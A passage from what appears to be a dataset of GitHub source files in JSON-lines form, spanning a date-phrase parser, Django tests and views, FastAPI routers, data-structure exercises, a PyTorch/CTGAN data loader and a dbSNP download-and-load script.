year)\ninterval_month.setParseAction(interval_month_action)\n\nthis_placeholder = pyparsing.Empty()('dir_rel').setParseAction(lambda: 0)\ninterval = pyparsing.MatchFirst([\n interval_month, interval_quarter, interval_year, last_this_next_interval, named_day,\n (this_placeholder + relative_date_unit)('calculatedTime').setParseAction(convert_to_interval)\n])\n\nbeginning_end_of = pyparsing.MatchFirst([\n utils.caseless_keyword_or(['beginning', 'start', 'middle', 'end'])('bound') + of_,\n utils.caseless_keyword_or(['early', 'late'])('bound'),\n utils.caseless_keyword('mid')('bound') + Optional(of_dash_)\n]) + interval\nbeginning_end_of.setParseAction(beginning_end_of_action)\n\nhalf_of = (utils.caseless_keyword_or(['earlier', 'first', 'later', 'second'])('half')) +\\\n utils.caseless_keyword('half') + Optional(of_dash_) + interval\nhalf_of.setParseAction(half_of_action)\n\nasap = utils.caseless_keyword('asap')\nasap.setParseAction(asap_action)\n\nbefore_after_datetime_object = pyparsing.MatchFirst([\n (between_ + datetime_spec)('inclusive_start') + (and_ + datetime_spec)('inclusive_end'),\n (Optional(from_) + datetime_spec)('inclusive_start') +\n (to_dash_ + datetime_spec)('inclusive_end'),\n (after_ + datetime_spec)('exclusive_start') + Optional(\n (before_ + datetime_spec)('exclusive_end')),\n (before_ + datetime_spec)('exclusive_end') + Optional(\n (after_ + datetime_spec)('exclusive_start')),\n])\nbefore_after_datetime_object.setParseAction(before_after_any)\n\nignore_greetings = 'good' + (morning | afternoon | evening | night)\n\ndelta_time = pyparsing.MatchFirst([\n ignore_greetings.suppress(\n ), # Allows multiple refactors related to morning/afternoon/evening/night keywords\n beginning_end_of,\n half_of,\n before_after_datetime_object,\n datetime_spec,\n rel_time_spec,\n last_this_next_interval + pyparsing.NotAny(datetime_spec),\n named_day_date_spec,\n now_datetime_spec,\n last_this_next_part_of_day,\n ignore_date_ydm.suppress(), # Required to prevent extracting a fragment of an invalid date\n interval_quarter,\n interval_month,\n interval_year4,\n asap,\n])\ndelta_time.addParseAction(set_datetime)\n","repo_name":"Zapship/kronosparser","sub_path":"kronosparser/time_parser.py","file_name":"time_parser.py","file_ext":"py","file_size_in_byte":34692,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"6304204275","text":"from django.db import connection\nfrom django.db.models import CharField\nfrom django.db.models.functions import MD5\nfrom django.test import TestCase\nfrom django.test.utils import register_lookup\n\nfrom ..models import Author\n\n\nclass MD5Tests(TestCase):\n @classmethod\n def setUpTestData(cls):\n Author.objects.bulk_create(\n [\n Author(alias=\"John Smith\"),\n Author(alias=\"Jordan Élena\"),\n Author(alias=\"皇帝\"),\n Author(alias=\"\"),\n Author(alias=None),\n ]\n )\n\n def test_basic(self):\n authors = (\n Author.objects.annotate(\n md5_alias=MD5(\"alias\"),\n )\n .values_list(\"md5_alias\", flat=True)\n .order_by(\"pk\")\n )\n self.assertSequenceEqual(\n authors,\n [\n \"6117323d2cabbc17d44c2b44587f682c\",\n \"ca6d48f6772000141e66591aee49d56c\",\n \"bf2c13bc1154e3d2e7df848cbc8be73d\",\n \"d41d8cd98f00b204e9800998ecf8427e\",\n \"d41d8cd98f00b204e9800998ecf8427e\"\n if connection.features.interprets_empty_strings_as_nulls\n else None,\n ],\n )\n\n def test_transform(self):\n with register_lookup(CharField, MD5):\n authors = Author.objects.filter(\n alias__md5=\"6117323d2cabbc17d44c2b44587f682c\",\n 
).values_list(\"alias\", flat=True)\n self.assertSequenceEqual(authors, [\"John Smith\"])\n","repo_name":"django/django","sub_path":"tests/db_functions/text/test_md5.py","file_name":"test_md5.py","file_ext":"py","file_size_in_byte":1542,"program_lang":"python","lang":"en","doc_type":"code","stars":74132,"dataset":"github-code","pt":"37"} +{"seq_id":"6782806225","text":"import math \r\ndef isGoodArray(nums):\r\n n = len(nums)\r\n #if there is just the number '1' in nums return true\r\n if n == 1:\r\n return nums[0] == 1\r\n #calc the first gcd\r\n d = math.gcd(nums[0], nums[1])\r\n #all we have to see is if there is a combination with gcd = 1\r\n for num in nums:\r\n d = math.gcd(num, d)\r\n return d == 1\r\n\r\nprint(isGoodArray([3,6,7,3,1,2,10]))\r\n\r\n\r\n\"\"\" Bézout's identity: gcd(a,b) = d -> f(x,y) | ax + by = d \"\"\"\r\n# https://en.wikipedia.org/wiki/B%C3%A9zout%27s_identity","repo_name":"NatiMoshe/LeetCode","sub_path":"1250. Check If It Is a Good Array.py","file_name":"1250. Check If It Is a Good Array.py","file_ext":"py","file_size_in_byte":528,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"37648197163","text":"from django.shortcuts import render, redirect\nfrom .models import Comment, Message\nfrom login_app.models import User\n\n# Create your views here.\ndef message(request):\n logged_user = User.objects.get(id = request.session[\"user_id\"])\n new_message = Message.objects.create(user = logged_user, content = request.POST[\"message_content\"])\n \n return redirect(\"/wall/\")\n\ndef comment(request):\n logged_user = User.objects.get(id = request.session[\"user_id\"])\n current_message = Message.objects.get(id=request.POST[\"message_id\"])\n new_comment = Comment.objects.create(message = current_message, user = logged_user, content = request.POST[\"comment_content\"])\n return redirect(\"/wall/\")\n\ndef delete_message(request):\n Message.objects.get(id = request.POST['message_id']).delete()\n return redirect(\"/wall/\")\n","repo_name":"MNeipp/django","sub_path":"the_wall/wall_app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":824,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"12096621539","text":"import json\n\nfrom fatgoose3.extractors import BaseExtractor\n\nKNOWN_SCHEMA_TYPES = (\n \"ReportageNewsArticle\",\n \"NewsArticle\",\n \"Article\"\n)\n\n\nclass SchemaExtractor(BaseExtractor):\n\n def extract(self):\n node = self.article.doc\n metas = self.parser.getElementsByTag(node, 'script', attr='type',\n value='application/ld\\\\+json')\n for meta in metas:\n try:\n content = json.loads(meta.text_content())\n if isinstance(content, list):\n for context in content:\n if (context[\"@context\"] == \"http://schema.org\" and\n context[\"@type\"] in KNOWN_SCHEMA_TYPES):\n return content\n elif isinstance(content, dict):\n if (content[\"@context\"] == \"http://schema.org\" and\n content[\"@type\"] in KNOWN_SCHEMA_TYPES):\n return content\n except (ValueError, KeyError):\n # If the contents are not proper JSON or a key we expect\n # to exist does not, continue to the next tag.\n continue\n return None\n","repo_name":"862187570/fatgoose3","sub_path":"fatgoose3/extractors/schema.py","file_name":"schema.py","file_ext":"py","file_size_in_byte":1227,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"37"} +{"seq_id":"8765645739","text":"from fastapi.routing import APIRouter\nimport schemas\nfrom 
routers.config import engine\nimport json\nfrom routers import Response\nfrom typing import Optional\nfrom fastapi import Query\n\nrouter=APIRouter(prefix=\"/branchWorkingHrs\",tags=['branchWorkingHrs'])\n\n@router.get('')\ndef getBranchWorkingHrs(branchId:Optional[int]=Query(None),parkingOwnerId:Optional[int]=Query(None)):\n try:\n with engine.connect() as cur:\n result=cur.execute(f\"\"\"EXEC [dbo].[getBranchWorkingHrs] ?,?\"\"\",(branchId,parkingOwnerId))\n rows=result.fetchone()\n result.close()\n if rows[0]:\n return {\"statusCode\": 1, \"response\": json.loads(rows[0]) if rows[0] != None else []}\n else:\n return Response(\"NotFound\")\n except Exception as e:\n print(\"Exception Error\",str(e))\n return{\"statusCode\":0,\"response\":\"Server Error\"}\n\n@router.post('')\ndef postBranchWorkingHrs(request:schemas.BranchWorkingHrs):\n try:\n with engine.connect() as cur:\n result=cur.execute(f\"\"\"EXEC [dbo].[postBranchWorkingHrs]\n @branchId =?,\n @parkingOwnerId =?,\n @workingDay =?,\n @fromTime =?,\n @toTime =?,\n @isHoliday =?,\n @createdBy =?\"\"\",\n (\n request.branchId,\n request.parkingOwnerId,\n request.workingDay,\n request.fromTime,\n request.toTime,\n request.isHoliday,\n request.createdBy))\n rows=result.fetchall()\n return{\"statusCode\":int(rows[0][1]),\"response\":rows[0][0]}\n except Exception as e:\n print(\"Exception Error\",str(e))\n return{\"statusCode\":0,\"response\":\"Server Error\"}\n\n\n@router.put('')\ndef putbranchWorkingHrs(request:schemas.PutBranchWorkingHrs):\n try:\n with engine.connect() as cur:\n result=cur.execute(f\"\"\"EXEC [dbo].[putBranchWorkingHrs]\n @uniqueId=?,\n @branchId =?,\n @parkingOwnerId =?,\n @workingDay =?,\n @fromTime =?,\n @toTime =?,\n @isHoliday =?,\n @updatedBy =?\"\"\",\n (\n request.uniqueId,\n request.branchId,\n request.parkingOwnerId,\n request.workingDay,\n request.fromTime,\n request.toTime,\n request.isHoliday,\n request.updatedBy))\n rows=result.fetchall()\n return{\"statusCode\":int(rows[0][1]),\"response\":rows[0][0]}\n except Exception as e:\n print(\"Exception Error\",str(e))\n return{\"statusCode\":0,\"response\":\"Server Error\"}","repo_name":"chinnies350/smartparkingdev","sub_path":"routers/branchWorkingHrs.py","file_name":"branchWorkingHrs.py","file_ext":"py","file_size_in_byte":3655,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"72486329068","text":"from pathlib import Path\r\nimport os\r\n'''----------------------------------------\r\n| Created by Kathryn Reese |\r\n| Class: Average Size |\r\n| Determines the average sizes of |\r\n| Geotiff's and shp files. 
|\r\n|------------------------------------------|\r\n'''\r\nclass average_size:\r\n def get_average(self, directory, num_images):\r\n dir = Path(directory)\r\n average_sz = 0\r\n num_files = 0\r\n units = \"kb\"\r\n img_num = 0\r\n for file in dir.glob('*.shp*'):\r\n if(img_num < num_images):\r\n average_sz += os.path.getsize(file)\r\n num_files += 1\r\n img_num += 1\r\n\r\n for file in dir.glob('*.tif*'):\r\n if(img_num < num_images):\r\n average_sz += os.path.getsize(file)\r\n num_files += 1\r\n units = \"gb\"\r\n img_num += 1\r\n\r\n average_sz = average_sz / num_files\r\n if(units == \"kb\"):\r\n print(str(average_sz) + \" bytes\")\r\n kilobytes = average_sz / (2 ** 10)\r\n return str(kilobytes) + \" kb\", average_sz\r\n if(units == \"gb\"):\r\n print(str(average_sz) + \" bytes\")\r\n gigabytes = average_sz / (2 ** 30)\r\n return str(gigabytes) + \" gb\", average_sz\r\n\r\n\r\ndef main():\r\n avsz = average_size()\r\n gigabytes, byt = avsz.get_average(\"Original_Images\", 200)\r\n kilobytes, byt2 = avsz.get_average(\"Applied_Images/Shape Files\", 200)\r\n print(gigabytes)\r\n print(kilobytes)\r\n print(str(byt2/byt) + \" bytes\")\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()","repo_name":"kat09tails/FireContourResearch","sub_path":"average_size.py","file_name":"average_size.py","file_ext":"py","file_size_in_byte":1561,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"20196650102","text":"class TrieNode:\n def __init__(self):\n self.children = [None]*26\n self.eow = False\nclass Trie:\n def __init__(self):\n self.root = TrieNode()\n \n def insert(self, word: str) -> None:\n root = self.root\n size = len(word)\n for i in range(size):\n idx = ord(word[i])-ord('a')\n if root.children[idx]:\n root = root.children[idx]\n else:\n root.children[idx] = TrieNode()\n root = root.children[idx]\n root.eow = True\n\n def search(self, word: str) -> bool:\n # print(self.root)\n root = self.root\n size = len(word)\n for i in range(size):\n idx = ord(word[i])-ord('a')\n if root.children[idx]:\n root = root.children[idx]\n else:\n return False\n return root.eow\n\n def startsWith(self, prefix: str) -> bool:\n root = self.root\n size = len(prefix)\n for i in range(size):\n idx = ord(prefix[i])-ord('a')\n if root.children[idx]:\n root = root.children[idx]\n else:\n return False\n return True\n\n\n# Your Trie object will be instantiated and called as such:\n# obj = Trie()\n# obj.insert(word)\n# param_2 = obj.search(word)\n# param_3 = obj.startsWith(prefix)","repo_name":"miruts-xz/competitive-programming","sub_path":"library/python/Trie.py","file_name":"Trie.py","file_ext":"py","file_size_in_byte":1357,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"8636988418","text":"# -*- coding: utf-8 -*-\n\nimport os\nimport torch.utils.data as Data\nimport torch\nimport numpy as np\nimport pandas as pd\nfrom torch.utils.data.sampler import WeightedRandomSampler\nfrom sdv.single_table import CTGANSynthesizer\nfrom sdv.metadata import SingleTableMetadata\nfrom sklearn.model_selection import ShuffleSplit\nfrom sklearn.preprocessing import MinMaxScaler\nfrom sklearn.preprocessing import StandardScaler\nfrom sdv.sampling import Condition\nimport opt\ndevice = opt.device\n\n# TODO: fix bug\ndef transform_dataset(x_data,y_data,n_input, n_output):\n # n_output is fixed at 1\n all_data = x_data\n data_size=x_data.shape[0]\n X = np.empty((data_size-n_input+1, n_input, all_data.shape[1]))\n Y = 
np.empty((data_size-n_input+1, y_data.shape[1]))\n for i in range(data_size - n_input+1):\n X[i] = all_data[i:i + n_input, :]\n Y[i] = y_data[i + n_input-1, :]\n return X,Y\n\n\n# Prepare the data\ndef get_data(path,step=512):\n \n train = pd.read_csv(path)\n train.columns=['speed', 'speed_med_5', 'speed_med_20', 'speed_SD_5', 'speed_SD_20',\n 'acceleration', 'acceleration_med_5', 'acceleration_med_20', 'acceleration_SD_5', 'acceleration_SD_20',\n 'angular_speed', 'angular_speed_med_5', 'angular_speed_med_20', 'angular_speed_SD_5', 'angular_speed_SD_20',\n 'angular_acceleration', 'angular_acceleration_med_5', 'angular_acceleration_med_20', 'angular_acceleration_SD_5', 'angular_acceleration_SD_20',\n 'angle_diff', 'angle_diff_med_5', 'angle_diff_med_20', 'angle_diff_SD_5', 'angle_diff_SD_20',\n 'tag','lon','lat']\n train_data = train.iloc[:, [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 26, 27]].to_numpy().astype(float)\n train_tag= train.iloc[:, [25]].to_numpy().astype(int)\n\n sss=ShuffleSplit(n_splits=1,test_size=opt.testRatio,random_state=0)\n for train_index,test_index in sss.split(train_data,train_tag):\n X_train,X_test=train_data[train_index],train_data[test_index]\n y_train,y_test=train_tag[train_index],train_tag[test_index]\n \n sss=ShuffleSplit(n_splits=1,test_size=opt.valRatio,random_state=0)\n for train_index,test_index in sss.split(X_train,y_train):\n X_train,X_valid=X_train[train_index],X_train[test_index]\n y_train,y_valid=y_train[train_index],y_train[test_index]\n\n # sc = StandardScaler()\n # X_train = sc.fit_transform(X_train)\n # X_valid = sc.transform(X_valid)\n # X_test = sc.transform(X_test)\n\n # X_all=sc.fit_transform(train_data)\n X_all=train_data\n\n if opt.useGAN==True:\n data_train=np.c_[X_train,y_train]\n data_train = pd.DataFrame(data_train,columns=['speed', 'speed_med_5', 'speed_med_20', 'speed_SD_5', 'speed_SD_20',\n 'acceleration', 'acceleration_med_5', 'acceleration_med_20', 'acceleration_SD_5', 'acceleration_SD_20',\n 'angular_speed', 'angular_speed_med_5', 'angular_speed_med_20', 'angular_speed_SD_5', 'angular_speed_SD_20',\n 'angular_acceleration', 'angular_acceleration_med_5', 'angular_acceleration_med_20', 'angular_acceleration_SD_5', 'angular_acceleration_SD_20',\n 'angle_diff', 'angle_diff_med_5', 'angle_diff_med_20', 'angle_diff_SD_5', 'angle_diff_SD_20',\n 'lon','lat','tag'])\n weightsPath=opt.GAN_path\n if(opt.useGAN_weights and os.path.exists(weightsPath)):\n model=CTGANSynthesizer.load(weightsPath)\n else:\n metadata = SingleTableMetadata()\n metadata.detect_from_dataframe(data_train)\n model = CTGANSynthesizer(\n metadata,\n epochs=opt.GAN_epoch,\n verbose=True\n )\n model.fit(data_train)\n model.save(weightsPath)\n ser=data_train['tag'].value_counts()\n num_rows=abs(ser[0]-ser[1])\n cnd=0\n if ser[0]>ser[1]:\n cnd=1\n condition = Condition({'tag': cnd}, num_rows=num_rows)\n synthetic_train = model.sample_from_conditions(conditions=[condition])\n data_train=pd.concat([data_train,synthetic_train], axis=0, ignore_index=True) # stack synthetic rows below the real ones\n X_train = data_train.iloc[:, [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26]].to_numpy().astype(float)\n y_train= data_train.iloc[:, [27]].to_numpy().astype(int).reshape(-1,1)\n # data_train.to_csv(r\"./data/generate/ctgan.csv\", index=False)\n\n X_train,y_train=transform_dataset(X_train,y_train,step,1)\n X_valid,y_valid=transform_dataset(X_valid,y_valid,step,1)\n X_test,y_test=transform_dataset(X_test,y_test,step,1)\n 
X_all,y_all=transform_dataset(X_all,train_tag,step,1)\n\n\n X_train = torch.tensor(X_train, dtype=torch.float32).to(device)\n y_train = torch.tensor(y_train).to(device)\n X_valid = torch.tensor(X_valid, dtype=torch.float32).to(device)\n y_valid = torch.tensor(y_valid).to(device)\n X_test=torch.tensor(X_test, dtype=torch.float32).to(device)\n y_test = torch.tensor(y_test).to(device)\n X_all=torch.tensor(X_all, dtype=torch.float32).to(device)\n y_all = torch.tensor(y_all).to(device)\n return X_train,y_train,X_valid,y_valid,X_test,y_test,X_all,y_all\n\n# Return the train/validation/test/full DataLoaders\ndef get_loader(path, step=512, batch_size=128,num_workers=4):\n X_train,y_train,X_valid,y_valid,X_test,y_test,X_all,y_all=get_data(path,step)\n return __dataLoader(X_train,y_train,batch_size,num_workers),__dataLoader(X_valid,y_valid,batch_size,num_workers),__dataLoader(X_test,y_test,batch_size,num_workers),__dataLoader(X_all,y_all,batch_size,num_workers)\n\n# Build a DataLoader; applies class-weighted sampling when GAN augmentation is enabled\ndef __dataLoader(X,Y,batch_size,num_workers=4):\n train_dataset = Data.TensorDataset(X.to(device), Y.to(device))\n if opt.useGAN==True:\n weights = [3 if label == 0 else 1 for label in Y]\n sampler = WeightedRandomSampler(weights,num_samples=Y.size()[0], replacement=True)\n train_loader=Data.DataLoader( \n dataset=train_dataset, batch_size=batch_size,num_workers=num_workers,sampler=sampler\n )\n else:\n train_loader = Data.DataLoader(\n dataset=train_dataset, batch_size=batch_size, shuffle=True,num_workers=num_workers)\n return train_loader\n\n# Return the prediction DataLoader (no shuffling)\ndef get_predict_loader(path, step=512, batch_size=128,num_workers=4):\n train = pd.read_csv(path)\n train.columns=['speed', 'speed_med_5', 'speed_med_20', 'speed_SD_5', 'speed_SD_20',\n 'acceleration', 'acceleration_med_5', 'acceleration_med_20', 'acceleration_SD_5', 'acceleration_SD_20',\n 'angular_speed', 'angular_speed_med_5', 'angular_speed_med_20', 'angular_speed_SD_5', 'angular_speed_SD_20',\n 'angular_acceleration', 'angular_acceleration_med_5', 'angular_acceleration_med_20', 'angular_acceleration_SD_5', 'angular_acceleration_SD_20',\n 'angle_diff', 'angle_diff_med_5', 'angle_diff_med_20', 'angle_diff_SD_5', 'angle_diff_SD_20',\n 'tag','lon','lat']\n train_data = train.iloc[:, [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 26, 27]].to_numpy().astype(float)\n train_tag= train.iloc[:, [25]].to_numpy().astype(int)\n\n # sc = StandardScaler()\n # X_all=sc.fit_transform(train_data)\n\n X_all=train_data\n X_all,y_all=transform_dataset(X_all,train_tag,step,1)\n\n X_all=torch.tensor(X_all, dtype=torch.float32).to(device)\n y_all = torch.tensor(y_all).to(device)\n\n dataset = Data.TensorDataset(X_all.to(device), y_all.to(device))\n loader = Data.DataLoader(dataset=dataset, batch_size=batch_size, shuffle=False,num_workers=num_workers)\n \n return loader\n\nif __name__==\"__main__\":\n # Quick test on the sample data\n get_data(r\"data\\train\\全部标注数据合并.csv\")\n","repo_name":"hysyyds/GAN-BiLSTM","sub_path":"utils/loader.py","file_name":"loader.py","file_ext":"py","file_size_in_byte":7950,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22675928856","text":"# queue implementation practice\n\n\nclass CircularQueue(object):\n\n def __init__(self):\n self.capacity = 5 # initial length of data array.\n\n # initializing data array\n self.data = []\n for i in range(self.capacity):\n self.data.append(None)\n\n self.front = 0\n self.end = -1\n self.size = 0\n\n def is_empty(self):\n if self.size == 0:\n return True\n else:\n return False\n\n 
def is_full(self):\n if self.size == self.capacity:\n return True\n else:\n return False\n\n def check_size(self):\n return self.size\n\n def check_capacity(self):\n return self.capacity\n\n def print_queue(self):\n print(self.data)\n print('front :', self.front, '/ end :', self.end)\n\n def get_front(self): # peek at the front element; named get_front since self.front is the index attribute\n if self.is_empty():\n print(\"queue is empty\")\n return None\n else:\n return self.data[self.front]\n\n # return circular index if input index is larger than maximum index of data array\n def get_circular_index(self, idx):\n if idx >= self.capacity:\n idx %= self.capacity\n return idx\n\n # reallocate the data array as one twice as large\n def data_reallocate(self):\n # initializing new data array\n new_capacity = 2*self.capacity\n self.new_data = []\n for i in range(new_capacity):\n self.new_data.append(None)\n\n # copy old data into new data array. rearrange data location so front index shall be zero(0)\n j = 0\n while self.front != self.end:\n self.new_data[j] = self.data[self.front]\n j += 1\n self.front += 1\n self.front = self.get_circular_index(self.front)\n\n self.new_data[j] = self.data[self.end] # after while loop, final data (at end index) is not copied yet.\n\n # reset front & end index, its capacity and data array name\n self.front = 0\n self.end = j\n self.data = self.new_data\n self.capacity = new_capacity\n\n def enqueue(self, value):\n if self.is_full():\n self.data_reallocate()\n\n self.size += 1\n self.end += 1\n self.end = self.get_circular_index(self.end) # if increased index is out of maximum, get circular index\n\n self.data[self.end] = value\n\n def dequeue(self):\n if self.is_empty():\n print(\"queue is empty\")\n return None\n else:\n front_data = self.data[self.front] # copy data which shall be popped.\n self.data[self.front] = None # remove popped data to prevent confusion\n self.front += 1\n self.size -= 1\n self.front = self.get_circular_index(self.front) # if increased index is out of maximum, get circular index\n return front_data # return copied data\n\n\n# Circular array queue implementation test\n# uncomment each line to test\n# cq = CircularQueue()\n# print('create Circular Queue instance. check size & capacity : ', cq.check_size(), '&', cq.check_capacity())\n# print('is queue empty? :', cq.is_empty())\n# print('\\nenqueue some data : [5,6,8,10,9]')\n# for i in [5, 6, 8, 10, 9]:\n# cq.enqueue(i)\n# print('is queue full now? :', cq.is_full())\n# cq.print_queue()\n#\n# print('\\ndequeue 3 items now')\n# print('dequeue :', cq.dequeue())\n# print('dequeue :', cq.dequeue())\n# print('dequeue :', cq.dequeue())\n# print('check size & capacity :', cq.check_size(), '&', cq.check_capacity())\n# cq.print_queue()\n#\n# print('\\nenqueue again now : [7,-2,-7]')\n# for i in [7, -2, -7]:\n# cq.enqueue(i)\n# print('check size & capacity :', cq.check_size(), '&', cq.check_capacity())\n# cq.print_queue()\n#\n# print('\\nenqueue more. test array reallocation : [12,15,19]')\n# for i in [12, 15, 19]:\n# cq.enqueue(i)\n# print('check size & capacity :', cq.check_size(), '&', cq.check_capacity())\n# cq.print_queue()\n# print('front :', cq.front, '/ end :', cq.end)\n","repo_name":"ino-jeong/study-practice","sub_path":"python practice/queue_practice(circular).py","file_name":"queue_practice(circular).py","file_ext":"py","file_size_in_byte":3948,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"30449523133","text":"# !/usr/bin/env python3\n# coding: utf-8\n\n# 5. 
Write a program that takes a list of strings and a number from the user and outputs\n# a new list of the words whose length is less than the given number.\n\n\ndef max_length(list1, max_len):\n i = 0\n while i < len(list1):\n if len(list1[i]) > max_len:\n del list1[i]\n else:\n i += 1\n return list1\n\n\ndef list_of_strings():\n list1 = list()\n while True:\n user_input = input(\"enter string to add in list or 'done' to finish: \")\n if user_input == 'done':\n break\n else:\n list1.append(user_input)\n return list1\n\n","repo_name":"PlusSP/Python","sub_path":"lists/strings_list.py","file_name":"strings_list.py","file_ext":"py","file_size_in_byte":768,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18647600053","text":"import asyncpg\nimport asyncio\nimport ftplib\nimport gzip\nfrom multiprocessing import cpu_count, Pool\nimport time\nimport threading\nfrom typing import List\nimport ujson as json\n\nfrom .types import (\n RefSnpCopyFromData,\n RefSnpAllele,\n RefSnpAlleleFreqStudy,\n RefSnpAlleleClinDisease)\n\n\nclass SnipLoader:\n def __init__(self, database_name): # , db_conn_string):\n self.database_name = database_name\n self.file_blocksize = 1024 * 1024\n\n def download_dbsnp_file(self, dbsnp_filename, chromosome):\n self.chromosome = str(chromosome)\n self.dbsnp_filename = dbsnp_filename\n with open(dbsnp_filename, \"wb\") as fp:\n ftp = ftplib.FTP(\"ftp.ncbi.nlm.nih.gov\")\n ftp.login()\n ftp.cwd(\"snp/.redesign/latest_release/JSON\")\n size_gb = round(ftp.size(dbsnp_filename) / (1024**3), 2)\n print(f\"Filesize: {size_gb} GB\")\n sock = None\n while not sock: # Try to open the socket conn w/ server\n print(\"Trying to establish FTP conn\")\n sock = ftp.transfercmd(f\"RETR {dbsnp_filename}\")\n time.sleep(5)\n\n def download():\n transferred, blocks = 0, 0\n while True:\n byte_chunk = sock.recv(1024*1024*8)\n if not byte_chunk:\n break\n blocks += 1\n transferred += len(byte_chunk)\n transferred_mb = round(transferred / 1024 / 1024, 2)\n if blocks % 1000 == 0:\n print(f\"Transferred {transferred_mb}MB / \"\n f\"{size_gb * 1024}MB\")\n fp.write(byte_chunk)\n sock.close()\n fp.close()\n t = threading.Thread(target=download)\n t.start()\n while t.is_alive():\n t.join(60)\n ftp.voidcmd(\"NOOP\")\n\n def load_ref_snps(self, dbsnp_filename, chromosome):\n self.chromosome = chromosome\n num_processes = cpu_count()\n print(f\"Found '{num_processes}' CPUs\")\n loop = asyncio.get_event_loop()\n with Pool(num_processes) as pool:\n with gzip.open(dbsnp_filename) as gzip_fp:\n print(\"Mapping...\")\n copy_from_data_iter = pool.imap_unordered(\n self._generate_parsed_data,\n gzip_fp,\n 1024)\n loop.run_until_complete(self._load(copy_from_data_iter))\n\n async def _load(self, parsed_data_iter):\n conn = await asyncpg.connect(database=self.database_name, user=\"SeanH\")\n await conn.execute(\"SET session_replication_role to 'replica'\")\n table_names = [table_name for table_name in RefSnpCopyFromData._fields]\n row_buff_dict = {table_name: [] for table_name in table_names}\n buff_size = 0\n for copy_from_data in parsed_data_iter:\n for table_name in table_names:\n for copy_from_row in getattr(copy_from_data, table_name):\n row_buff_dict[table_name].append(copy_from_row)\n buff_size += 1\n if buff_size % 5000 == 0: # Dump\n print(f\"Dumping (SNPs Processed: {buff_size})\")\n await self._dump_buffer(row_buff_dict, conn)\n row_buff_dict = {table_name: [] for table_name in table_names}\n print(\"Done.\")\n await conn.close()\n\n 
async def _dump_buffer(self, row_buff_dict, conn):\n for table_name in row_buff_dict.keys():\n records = row_buff_dict[table_name]\n if not records:\n continue\n await conn.copy_records_to_table(\n table_name,\n records=records,\n columns=records[0]._fields)\n\n def _generate_parsed_data(self, raw_line) -> RefSnpCopyFromData:\n rsnp_json = json.loads(raw_line)\n ref_snp_id = int(rsnp_json['refsnp_id'])\n rsnp_placements = rsnp_json['primary_snapshot_data'][\n 'placements_with_allele']\n copy_from_data = RefSnpCopyFromData(\n ref_snp_alleles=[],\n ref_snp_allele_freq_studies=[],\n ref_snp_allele_clin_diseases=[])\n if not rsnp_placements:\n return copy_from_data\n allele_data = self._find_alleles_from_assembly(rsnp_placements)\n if not allele_data:\n return copy_from_data\n variant_ref_snp_alleles = self._get_variant_alleles(self.chromosome,\n allele_data,\n ref_snp_id)\n if not variant_ref_snp_alleles:\n return copy_from_data\n for allele in variant_ref_snp_alleles:\n allele_idx = allele.ref_snp_allele_idx\n allele_annotation = rsnp_json['primary_snapshot_data'][\n 'allele_annotations'][allele_idx]\n gene_locii = self._parse_gene_locii(allele_annotation)\n freq_studies = self._parse_freq_studies(allele_annotation,\n ref_snp_id, allele_idx)\n clin_diseases = self._parse_clin_diseases(allele_annotation,\n ref_snp_id, allele_idx)\n copy_from_data = self._update_copy_from_data(\n copy_from_data, allele, freq_studies, clin_diseases, gene_locii)\n return copy_from_data\n\n @staticmethod\n def _find_alleles_from_assembly(rsnp_placements,\n assembly_name=\"GRCh38\"):\n for rsnp_placement in rsnp_placements:\n annot = rsnp_placement.get('placement_annot')\n if not annot or not annot.get('seq_id_traits_by_assembly'):\n return\n assembly_info_ls = annot['seq_id_traits_by_assembly']\n assembly_info = assembly_info_ls[0]\n this_assembly_name = assembly_info.get(\"assembly_name\")\n if assembly_name in this_assembly_name:\n return rsnp_placement['alleles']\n\n @staticmethod\n def _get_variant_alleles(chromosome, alleles,\n ref_snp_id) -> List[RefSnpAllele]:\n variant_alleles = []\n for idx, allele in enumerate(alleles):\n spdi = allele['allele']['spdi']\n ins, delete = spdi['inserted_sequence'], spdi['deleted_sequence']\n if ins != delete:\n variant_alleles.append(RefSnpAllele(\n ins_seq=ins,\n del_seq=delete,\n position=spdi['position'],\n ref_snp_allele_idx=idx,\n chromosome=chromosome,\n ref_snp_id=ref_snp_id,\n gene_locii=None))\n return variant_alleles\n\n @staticmethod\n def _update_copy_from_data(copy_from_data: RefSnpCopyFromData,\n allele: RefSnpAllele,\n freq_studies: List[RefSnpAlleleFreqStudy],\n clin_diseases: List[RefSnpAlleleClinDisease],\n gene_locii: List[str]):\n copy_from_data.ref_snp_alleles.append(\n RefSnpAllele(\n del_seq=allele.del_seq,\n ins_seq=allele.ins_seq,\n position=allele.position,\n ref_snp_allele_idx=allele.ref_snp_allele_idx,\n chromosome=allele.chromosome,\n ref_snp_id=allele.ref_snp_id,\n gene_locii=gene_locii))\n copy_from_data.ref_snp_allele_freq_studies.extend(freq_studies)\n copy_from_data.ref_snp_allele_clin_diseases.extend(clin_diseases)\n return copy_from_data\n\n @staticmethod\n def _parse_freq_studies(allele_annotation, ref_snp_id, allele_idx):\n return 